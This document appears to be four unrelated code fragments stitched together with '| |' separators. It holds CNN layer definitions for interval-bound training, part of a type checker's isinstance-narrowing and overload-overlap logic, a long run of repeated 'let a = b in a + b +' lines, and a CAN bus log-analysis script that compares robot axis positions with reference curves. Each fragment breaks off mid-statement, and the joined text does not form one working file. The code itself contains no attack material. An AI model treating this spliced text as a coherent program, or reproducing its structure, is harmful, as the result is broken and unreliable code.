elif size == 'C3s':
self.width = 2
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//4)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.pool,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_C3s-{self.width}_' + dset_in_name
elif size == 'S':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//4)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.pool,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'SR':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.pool1 = modules_ibp.AvgPool2dI(2)
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.pool2 = modules_ibp.AvgPool2dI(2)
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool3 = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//16)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = nn.ModuleList([self.C1,
self.A1,
self.pool1,
self.C2,
self.A2,
self.pool2,
self.C3,
self.A3,
self.pool3,
self.F,
self.L4,
self.A4,
self.L5,
])
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'SR2':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.pool2 = modules_ibp.AvgPool2dI(2)
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool3 = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//8)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.pool2,
self.C3,
self.A3,
self.pool3,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'XS':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 64*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(64*self.width, 128*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128*self.width, 128*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(128*self.width*(self.hw//4)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.pool,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'C4':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 512*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(512*self.width, 1024*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(1024*self.width, 512*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(512*self.width*(self.hw//2)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_C4-{self.width}_' + dset_in_name
elif size == 'C5':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 512, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(512, 512, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(512, 512, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(512, 512, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(512, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_C5_' + dset_in_name
elif size == 'C6':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, | |
dict keyed by the nodes' literal_hash
# field instead.
# NB: This should be `TypeMap = Optional[Dict[Node, Type]]`!
# But see https://github.com/python/mypy/issues/1637
TypeMap = Dict[Node, Type]
def conditional_type_map(expr: Node,
current_type: Optional[Type],
proposed_type: Optional[Type],
*,
weak: bool = False
) -> Tuple[TypeMap, TypeMap]:
"""Takes in an expression, the current type of the expression, and a
proposed type of that expression.
Returns a 2-tuple: The first element is a map from the expression to
the proposed type, if the expression can be the proposed type. The
second element is a map from the expression to the type it would hold
if it was not the proposed type, if any."""
if proposed_type:
if current_type:
if is_proper_subtype(current_type, proposed_type):
return {expr: proposed_type}, None
elif not is_overlapping_types(current_type, proposed_type):
return None, {expr: current_type}
else:
remaining_type = restrict_subtype_away(current_type, proposed_type)
return {expr: proposed_type}, {expr: remaining_type}
else:
return {expr: proposed_type}, {}
else:
# An isinstance check, but we don't understand the type
if weak:
return {expr: AnyType()}, {expr: current_type}
else:
return {}, {}
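# Informal example: for an `isinstance(x, int)` check where x currently has type
# Union[int, str], conditional_type_map returns ({x: int}, {x: str}) -- the if-branch
# narrows x to int and the else-branch keeps the remaining type str.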
def is_literal_none(n: Node) -> bool:
return isinstance(n, NameExpr) and n.fullname == 'builtins.None'
def and_conditional_maps(m1: TypeMap, m2: TypeMap) -> TypeMap:
"""Calculate what information we can learn from the truth of (e1 and e2)
in terms of the information that we can learn from the truth of e1 and
the truth of e2.
"""
if m1 is None or m2 is None:
# One of the conditions can never be true.
return None
# Both conditions can be true; combine the information. Anything
# we learn from either conditions's truth is valid. If the same
# expression's type is refined by both conditions, we somewhat
# arbitrarily give precedence to m2. (In the future, we could use
# an intersection type.)
result = m2.copy()
m2_keys = set(n2.literal_hash for n2 in m2)
for n1 in m1:
if n1.literal_hash not in m2_keys:
result[n1] = m1[n1]
return result
def or_conditional_maps(m1: TypeMap, m2: TypeMap) -> TypeMap:
"""Calculate what information we can learn from the truth of (e1 or e2)
in terms of the information that we can learn from the truth of e1 and
the truth of e2.
"""
if m1 is None:
return m2
if m2 is None:
return m1
# Both conditions can be true. Combine information about
# expressions whose type is refined by both conditions. (We do not
# learn anything about expressions whose type is refined by only
# one condition.)
result = {}
for n1 in m1:
for n2 in m2:
if n1.literal_hash == n2.literal_hash:
result[n1] = UnionType.make_simplified_union([m1[n1], m2[n2]])
return result
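# Informal sketch of the two combinators (hypothetical maps):
#   and_conditional_maps({x: int}, {y: str}) -> {x: int, y: str}    (keep both refinements)
#   or_conditional_maps({x: int}, {x: str})  -> {x: Union[int, str]} (only expressions
#   refined by both sides survive, joined as a simplified union)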
def find_isinstance_check(node: Node,
type_map: Dict[Node, Type],
weak: bool=False
) -> Tuple[TypeMap, TypeMap]:
"""Find any isinstance checks (within a chain of ands). Includes
implicit and explicit checks for None.
Return value is a map of variables to their types if the condition
is true and a map of variables to their types if the condition is false.
If either of the values in the tuple is None, then that particular
branch can never occur.
Guaranteed to not return None, None. (But may return {}, {})
"""
if isinstance(node, CallExpr):
if refers_to_fullname(node.callee, 'builtins.isinstance'):
expr = node.args[0]
if expr.literal == LITERAL_TYPE:
vartype = type_map[expr]
type = get_isinstance_type(node.args[1], type_map)
return conditional_type_map(expr, vartype, type, weak=weak)
elif (isinstance(node, ComparisonExpr) and any(is_literal_none(n) for n in node.operands) and
experiments.STRICT_OPTIONAL):
# Check for `x is None` and `x is not None`.
is_not = node.operators == ['is not']
if is_not or node.operators == ['is']:
if_vars = {} # type: Dict[Node, Type]
else_vars = {} # type: Dict[Node, Type]
for expr in node.operands:
if expr.literal == LITERAL_TYPE and not is_literal_none(expr) and expr in type_map:
# This should only be true at most once: there should be
# two elements in node.operands, and at least one of them
# should represent a None.
vartype = type_map[expr]
if_vars, else_vars = conditional_type_map(expr, vartype, NoneTyp(), weak=weak)
break
if is_not:
if_vars, else_vars = else_vars, if_vars
return if_vars, else_vars
elif isinstance(node, RefExpr):
# Restrict the type of the variable to True-ish/False-ish in the if and else branches
# respectively
vartype = type_map[node]
if_type = true_only(vartype)
else_type = false_only(vartype)
ref = node # type: Node
if_map = {ref: if_type} if not isinstance(if_type, UninhabitedType) else None
else_map = {ref: else_type} if not isinstance(else_type, UninhabitedType) else None
return if_map, else_map
elif isinstance(node, OpExpr) and node.op == 'and':
left_if_vars, left_else_vars = find_isinstance_check(
node.left,
type_map,
weak,
)
right_if_vars, right_else_vars = find_isinstance_check(
node.right,
type_map,
weak,
)
# (e1 and e2) is true if both e1 and e2 are true,
# and false if at least one of e1 and e2 is false.
return (and_conditional_maps(left_if_vars, right_if_vars),
or_conditional_maps(left_else_vars, right_else_vars))
elif isinstance(node, OpExpr) and node.op == 'or':
left_if_vars, left_else_vars = find_isinstance_check(
node.left,
type_map,
weak,
)
right_if_vars, right_else_vars = find_isinstance_check(
node.right,
type_map,
weak,
)
# (e1 or e2) is true if at least one of e1 or e2 is true,
# and false if both e1 and e2 are false.
return (or_conditional_maps(left_if_vars, right_if_vars),
and_conditional_maps(left_else_vars, right_else_vars))
elif isinstance(node, UnaryExpr) and node.op == 'not':
left, right = find_isinstance_check(node.expr, type_map, weak)
return right, left
# Not a supported isinstance check
return {}, {}
def get_isinstance_type(node: Node, type_map: Dict[Node, Type]) -> Type:
type = type_map[node]
if isinstance(type, TupleType):
all_types = type.items
else:
all_types = [type]
types = [] # type: List[Type]
for type in all_types:
if isinstance(type, FunctionLike):
if type.is_type_obj():
# Type variables may be present -- erase them, which is the best
# we can do (outside disallowing them here).
type = erase_typevars(type.items()[0].ret_type)
types.append(type)
if len(types) == 0:
return None
elif len(types) == 1:
return types[0]
else:
return UnionType(types)
def expand_node(defn: Node, map: Dict[TypeVarId, Type]) -> Node:
visitor = TypeTransformVisitor(map)
return defn.accept(visitor)
def expand_func(defn: FuncItem, map: Dict[TypeVarId, Type]) -> FuncItem:
return cast(FuncItem, expand_node(defn, map))
class TypeTransformVisitor(TransformVisitor):
def __init__(self, map: Dict[TypeVarId, Type]) -> None:
super().__init__()
self.map = map
def type(self, type: Type) -> Type:
return expand_type(type, self.map)
def is_unsafe_overlapping_signatures(signature: Type, other: Type) -> bool:
"""Check if two signatures may be unsafely overlapping.
Two signatures s and t are overlapping if both can be valid for the same
statically typed values and the return types are incompatible.
Assume calls are first checked against 'signature', then against 'other'.
Thus if 'signature' is more general than 'other', there is no unsafe
overlapping.
TODO If argument types vary covariantly, the return type may vary
covariantly as well.
"""
if isinstance(signature, CallableType):
if isinstance(other, CallableType):
# TODO varargs
# TODO keyword args
# TODO erasure
# TODO allow to vary covariantly
# Check if the argument counts are overlapping.
min_args = max(signature.min_args, other.min_args)
max_args = min(len(signature.arg_types), len(other.arg_types))
if min_args > max_args:
# Argument counts are not overlapping.
return False
# Signatures are overlapping iff if they are overlapping for the
# smallest common argument count.
for i in range(min_args):
t1 = signature.arg_types[i]
t2 = other.arg_types[i]
if not is_overlapping_types(t1, t2):
return False
# All arguments types for the smallest common argument count are
# overlapping => the signature is overlapping. The overlapping is
# safe if the return types are identical.
if is_same_type(signature.ret_type, other.ret_type):
return False
# If the first signature has more general argument types, the
# latter will never be called
if is_more_general_arg_prefix(signature, other):
return False
return not is_more_precise_signature(signature, other)
return True
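# Informal example (under the checks above): with signature = `def f(x: int) -> int`
# checked before other = `def f(x: object) -> str`, the argument types overlap, the
# return types are incompatible, and the first signature is neither more general nor
# more precise than the second, so the pair would be reported as unsafely overlapping.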
def is_more_general_arg_prefix(t: FunctionLike, s: FunctionLike) -> bool:
"""Does t have wider arguments than s?"""
# TODO should an overload with additional items be allowed to be more
# general than one with fewer items (or just one item)?
# TODO check argument kinds
if isinstance(t, CallableType):
if isinstance(s, CallableType):
return all(is_proper_subtype(args, argt)
for argt, args in zip(t.arg_types, s.arg_types))
elif isinstance(t, FunctionLike):
if isinstance(s, FunctionLike):
if len(t.items()) == len(s.items()):
return all(is_same_arg_prefix(items, itemt)
for items, itemt in zip(t.items(), s.items()))
return False
def is_same_arg_prefix(t: CallableType, s: CallableType) -> bool:
# TODO check argument kinds
return all(is_same_type(argt, args)
for argt, args in zip(t.arg_types, s.arg_types))
def is_more_precise_signature(t: CallableType, s: CallableType) -> bool:
"""Is t more precise than s?
A signature t is more precise than s if all argument types and | |
+ b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b +
let a = b in a + b | |
#!/usr/bin/env python
# author: d.koch
# coding: utf-8
# naming: pep-0008
# typing: pep-0484
# docstring: pep-0257
# indentation: tabulation
""" canp_test.py
Simple CAN interface tester
"""
# --- IMPORT ---
# Standard libraries (installed with python)
import asyncio
#import atexit
#import json
#import logging
import os
#import random
#import re
import sys
#import time
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
#from math import cos, sin
#from typing import Any
#from typing import Callable
#from typing import Dict
from typing import List
#from typing import Optional
#from typing import Union
# . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
# External libraries (installed with pip, conda, setup.py, ...)
# python3 -m pip install --upgrade similaritymeasures
import similaritymeasures
# python3 -m pip install --upgrade numpy
import numpy as np
# . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
# Included libraries (this module, local files)
# canp_conv : data type conversion
# canp_enum : enum values
# canp_path : path parser
# canp_logs : logs logger
# canp_args : args dispatcher
# canp_card : card level (selection of the adapter and its speed)
# canp_chan : channel splitter (redirect frame on the right node)
# canp_node : node manager (most of the work is done there)
# canp_conf : configuration objects (from EDS/DCF file)
from canp_card import canp_card
from canp_card import CANP_CARD__BAUD_500K
from canp_card import CANP_CARD__RE_FRAME
from canp_enum import CANP_ENUM__APP_NAME
from canp_enum import CANP_ENUM__HEAD_LIST
from canp_enum import CANP_ENUM__HEAD_MAIN
from canp_enum import CANP_ENUM__HEAD_NAME
from canp_enum import CANP_ENUM__STR_SPACE
from canp_args import canp_args
from canp_logs import canp_logs
from canp_view_mpl import canp_view_mpl
from canp_view_dpg import canp_view_dpg
from canp_view_enaml import canp_view_enaml
from canp_view_flexx import canp_view_flexx
# --- GLOBAL ---
# Local settings (might be present in other files yet with different values)
ASYNC_RUN = asyncio.run
ASYNC_LOOP = asyncio.get_event_loop()
ASLEEP = asyncio.sleep
# Card (see can.interfaces.BACKENDS)
CANP_TEST__CARD = "neovi"
# Channel
CANP_TEST__CHAN = 2
# Nodes
CANP_TEST__NODE_AXIS_X = 1
CANP_TEST__NODE_AXIS_Y = 2
CANP_TEST__NODE_AXIS_Z = 3
CANP_TEST__NODE_GRIP = 4
# Configuration files
# /!\ Use v1.0, not v1.2, even though v1.2 looks more recent
CANP_TEST__FILE_EDS = "PAC-P3_v1.0.eds"
CANP_TEST__FILE_DCF = "carteGripper_config_01.dcf"
# Log file (beware of format, it must be supported to be parsed correctly)
CANP_TEST__FILE_LOG = "python_can.logger_c_2_all_axis_rot.log"
#CANP_TEST__FILE_LOG = "cycle U 8u20 9-16-2021 11-58-56 am.asc"
# Array indexes
CANP_TEST__ARR_TMP = 0
CANP_TEST__ARR_POS = 1
# Can object index for Position (depends on configuration file because PDO)
CANP_TEST__POS_OBJ = 0x6064
CANP_TEST__POS_SUB = 0
# Setting global wide logger (used in sub classes as well, hopefully)
g_logs = canp_logs.logger(CANP_ENUM__APP_NAME)
# --- CLASS ---
# --- MAIN ---
def __main__(i_list_args: List = []):
""" Basic self test (debugging)
"""
global g_logs
if False:
# Display log file (line by line)
g_logs.debug("--- CAN LOG DISPLAY ---")
with open(str(CANP_TEST__FILE_LOG)) as obj_file_:
for num_line_, str_line_ in enumerate(obj_file_, 1):
str_line_.strip()
# '(142.844095) 2 381#6C4E0000FEFFFFFF'
g_logs.debug(f"{num_line_}:'{str_line_}'")
l_list_line = CANP_CARD__RE_FRAME.split(str_line_)
l_list_line = CANP_ENUM__STR_SPACE.join(l_list_line).split()
g_logs.debug(f"{num_line_}:{l_list_line}\n")
# ['142.844095', '2', '381', '6C4E0000FEFFFFFF']
else:
# Creating "card" object (to connect to CAN or parse LOG files)
l_obj_can = canp_card()
# Configure channel and its nodes (using EDS/DCF description file)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_AXIS_X,
i_str_file = CANP_TEST__FILE_EDS)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_AXIS_Y,
i_str_file = CANP_TEST__FILE_EDS)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_AXIS_Z,
i_str_file = CANP_TEST__FILE_EDS)
l_obj_can.node_conf(
i_int_chan = CANP_TEST__CHAN,
i_int_node = CANP_TEST__NODE_GRIP,
i_str_file = CANP_TEST__FILE_DCF)
# Select the data source (LOG file or real time CAN data)
if True:
g_logs.debug("--- CAN LOG PARSE ---")
l_obj_can.log_parse(
i_str_file = CANP_TEST__FILE_LOG)
else:
g_logs.debug("--- CAN BUS PARSE ---")
l_obj_can.can_parse(
i_str_card = CANP_TEST__CARD,
i_str_chan = str(CANP_TEST__CHAN),
i_int_baud = CANP_CARD__BAUD_500K,
i_int_count = 100000)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# The hierarchy is as follow :
# CARD object
# CHAN object
# NODE object
# OBJS dict (all sub registers)
# SUBS dict
# DATA (last data stored)
# LIST (all data stored in (time, data) format)
g_logs.debug("Testing...")
#l_obj_can.m_dict_chans[2].m_dict_nodes[2].m_dict_objs[0x6064][0]
#l_obj_can[2][2][0x6064][0]
# Doing some math (rotor increment into mm)
l_float_pos_ratio = 1.0
l_float_pos_ratio = (4096 * 10) / 204
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Extracting X axis data (with numpy conversion)
l_list_x_can = l_obj_can[CANP_TEST__CHAN][CANP_TEST__NODE_AXIS_X][CANP_TEST__POS_OBJ][CANP_TEST__POS_SUB][CANP_ENUM__HEAD_LIST]
l_narr_x_can = np.zeros((len(l_list_x_can), 2))
l_narr_x_can[:, CANP_TEST__ARR_TMP] = [f[CANP_TEST__ARR_TMP] for f in l_list_x_can]
l_narr_x_can[:, CANP_TEST__ARR_POS] = [f[CANP_TEST__ARR_POS] / l_float_pos_ratio for f in l_list_x_can]
# Starting timestamp (exact or manual value)
l_float_tmp_start = l_list_x_can[0][CANP_TEST__ARR_TMP]
l_float_tmp_start = 143.0 # Time base for "reference" curve
# Offsetting time and position (plus zipping them)
l_list_x_ref_tmp = [ts + l_float_tmp_start for ts in [0.0, 6.93, 10.15, 10.8, 14.02, 53.0]]
l_list_x_ref_pos = [ps / l_float_pos_ratio for ps in [20075, 20075, 107450, 107450, 20075, 20075]]
l_zipr_x_ref = zip(l_list_x_ref_tmp, l_list_x_ref_pos)
# Converting time and position to numpy format
l_narr_x_ref = np.zeros((6, 2))
l_narr_x_ref[:, CANP_TEST__ARR_TMP] = l_list_x_ref_tmp
l_narr_x_ref[:, CANP_TEST__ARR_POS] = l_list_x_ref_pos
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Extracting Y axis data (with numpy conversion)
l_list_y_can = l_obj_can[CANP_TEST__CHAN][CANP_TEST__NODE_AXIS_Y][CANP_TEST__POS_OBJ][0][CANP_ENUM__HEAD_LIST]
l_narr_y_can = np.zeros((len(l_list_y_can), 2))
l_narr_y_can[:, CANP_TEST__ARR_TMP] = [f[CANP_TEST__ARR_TMP] for f in l_list_y_can]
l_narr_y_can[:, CANP_TEST__ARR_POS] = [f[CANP_TEST__ARR_POS] / l_float_pos_ratio for f in l_list_y_can]
# Offsetting time and position (plus zipping them)
l_list_y_ref_tmp = [ts + l_float_tmp_start for ts in [0.0, 16.15, 19.86, 20.81, 24.51, 53.0]]
l_list_y_ref_pos = [ps / l_float_pos_ratio for ps in [29050, 29050, 174300, 174300, 29050, 29050]]
l_zipr_y_ref = zip(l_list_y_ref_tmp, l_list_y_ref_pos)
# Converting time and position to numpy format
l_narr_y_ref = np.zeros((6, 2))
l_narr_y_ref[:, CANP_TEST__ARR_TMP] = l_list_y_ref_tmp
l_narr_y_ref[:, CANP_TEST__ARR_POS] = l_list_y_ref_pos
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Extracting Z axis data (with numpy conversion)
l_list_z_can = l_obj_can[CANP_TEST__CHAN][CANP_TEST__NODE_AXIS_Z][CANP_TEST__POS_OBJ][0][CANP_ENUM__HEAD_LIST]
l_narr_z_can = np.zeros((len(l_list_z_can), 2))
l_narr_z_can[:, CANP_TEST__ARR_TMP] = [f[CANP_TEST__ARR_TMP] for f in l_list_z_can]
l_narr_z_can[:, CANP_TEST__ARR_POS] = [f[CANP_TEST__ARR_POS] / l_float_pos_ratio for f in l_list_z_can]
# Offsetting time and position (plus zipping them)
l_list_z_ref_tmp = [ts + l_float_tmp_start for ts in [0.0, 26.38, 30.23, 30.71, 34.57, 53.0]]
l_list_z_ref_pos = [ps / l_float_pos_ratio for ps in [15180, 15180, 94100, 94100, 15170, 15170]]
l_zipr_z_ref = zip(l_list_z_ref_tmp, l_list_z_ref_pos)
# Converting time and position to numpy format
l_narr_z_ref = np.zeros((6, 2))
l_narr_z_ref[:, CANP_TEST__ARR_TMP] = l_list_z_ref_tmp
l_narr_z_ref[:, CANP_TEST__ARR_POS] = l_list_z_ref_pos
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Partial Curve Mapping : matches the area of a subset between the two curves
# Discrete Frechet : shortest distance between two curves, where you are allowed to vary the speed at which you travel along each curve independently (walking dog problem)
# Area : algorithm for calculating the Area between two curves in 2D space
# Curve Length : assumes that the only true independent variable of the curves is the arc-length distance along the curve from the origin
# Dynamic Time Warping : non-metric distance between two time-series curves that has been proven useful for a variety of applications
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Calculating stats for X axis
l_float_x_pcm = similaritymeasures.pcm(l_narr_x_can, l_narr_x_ref)
l_float_x_df = similaritymeasures.frechet_dist(l_narr_x_can, l_narr_x_ref)
l_float_x_area = 0.0
#l_float_x_area = similaritymeasures.area_between_two_curves(l_narr_x_can, l_narr_x_ref)
l_float_x_cl = similaritymeasures.curve_length_measure(l_narr_x_can, l_narr_x_ref)
l_float_x_dtw, l_float_x_d = similaritymeasures.dtw(l_narr_x_can, l_narr_x_ref)
g_logs.debug(f"X :"
f" pcm={l_float_x_pcm:.3f}/0,"
f" df={l_float_x_df:.3f},"
f" area={l_float_x_area:.3f}/m2,"
f" cl={l_float_x_cl:.3f}/0,"
f" dtw={l_float_x_dtw:.3f}")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Calculating stats for Y axis
l_float_y_pcm = similaritymeasures.pcm(l_narr_y_can, l_narr_y_ref)
l_float_y_df = similaritymeasures.frechet_dist(l_narr_y_can, l_narr_y_ref)
l_float_y_area = 0.0
#l_float_y_area = similaritymeasures.area_between_two_curves(l_narr_y_can, l_narr_y_ref)
l_float_y_cl = similaritymeasures.curve_length_measure(l_narr_y_can, l_narr_y_ref)
l_float_y_dtw, l_float_y_d = similaritymeasures.dtw(l_narr_y_can, l_narr_y_ref)
g_logs.debug(f"Y :"
f" pcm={l_float_y_pcm:.3f}/0,"
f" df={l_float_y_df:.3f},"
f" area={l_float_y_area:.3f}/m2,"
f" cl={l_float_y_cl:.3f}/0,"
f" dtw={l_float_y_dtw:.3f}")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Calculating stats for Z axis
l_float_z_pcm = similaritymeasures.pcm(l_narr_z_can, l_narr_z_ref)
l_float_z_df = similaritymeasures.frechet_dist(l_narr_z_can, l_narr_z_ref)
l_float_z_area = 0.0
#l_float_z_area = similaritymeasures.area_between_two_curves(l_narr_z_can, l_narr_z_ref)
l_float_z_cl = similaritymeasures.curve_length_measure(l_narr_z_can, l_narr_z_ref)
l_float_z_dtw, l_float_z_d = similaritymeasures.dtw(l_narr_z_can, l_narr_z_ref)
g_logs.debug(f"Z :"
